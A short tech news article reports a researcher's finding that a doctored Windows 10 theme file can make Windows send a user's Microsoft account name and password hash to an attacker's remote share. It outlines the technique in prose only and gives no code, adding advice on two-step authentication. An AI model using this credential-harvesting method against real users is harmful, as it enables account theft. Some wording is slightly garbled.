Changing your Windows theme seems innocent enough, and it̵7;s nice to freshen things up sometimes. But you may want to be careful about which sources you use to get new themes. A security researcher has shown a way to change Windows 10 themes to steal your Microsoft password.
As discovered by Bleeping Computer, security researcher Jimmy Bayne (@bohops) shows that the process is not even difficult. It uses several Windows behaviors to execute a “Pass-the-Hash” attack.
In a “Pass-the-Hash” attack, bad actors do not worry about getting your password in plain text. They create an attack that sends them your hashed password. Then they can send it for authentication to Microsoft (or whatever company the password is for), and because it matches correctly, it works in the same way as using the password for plain text.
[Credential Harvesting Trick] Using a Windows theme file, the background key can be configured to point to a remote http / s resource. When a user activates the theme file (for example, opens from a link / attachment), a user cred prompt is displayed to the user 1/4 pic.twitter.com/rgR3a9KP6Q
– bohops (@bohops) 5 September 2020
As Bayne explains, hackers can change a Windows theme to force the operating system to try to connect to a remote SMB share that requires authentication. When Windows connects to a remote SMB share, it automatically sends your profile information to log in.
Microsoft moved to online accounts with Windows 10, and it’s slowly driving everyone to use them. If you are already using your Microsoft account, this means that your Microsoft username and hashed password will be sent to the hacker.
Once the hacker has changed a theme, they can save it and upload it to websites that host Windows themes. You do not know what struck you until it is too late. Bayne reported the problem to Microsoft, but the company refuses to create a fix because it is a “design by design” feature.
Bayne suggested some solutions, but they’re about breaking the theme component for Windows.
Once you have done that, you can not change themes (until you undo the change). The safest thing you can do is enable 2-step authentication. If someone steals your password, they still do not have everything they need to get into your account.
Source: Jimmy Bayne via Bleeping Computer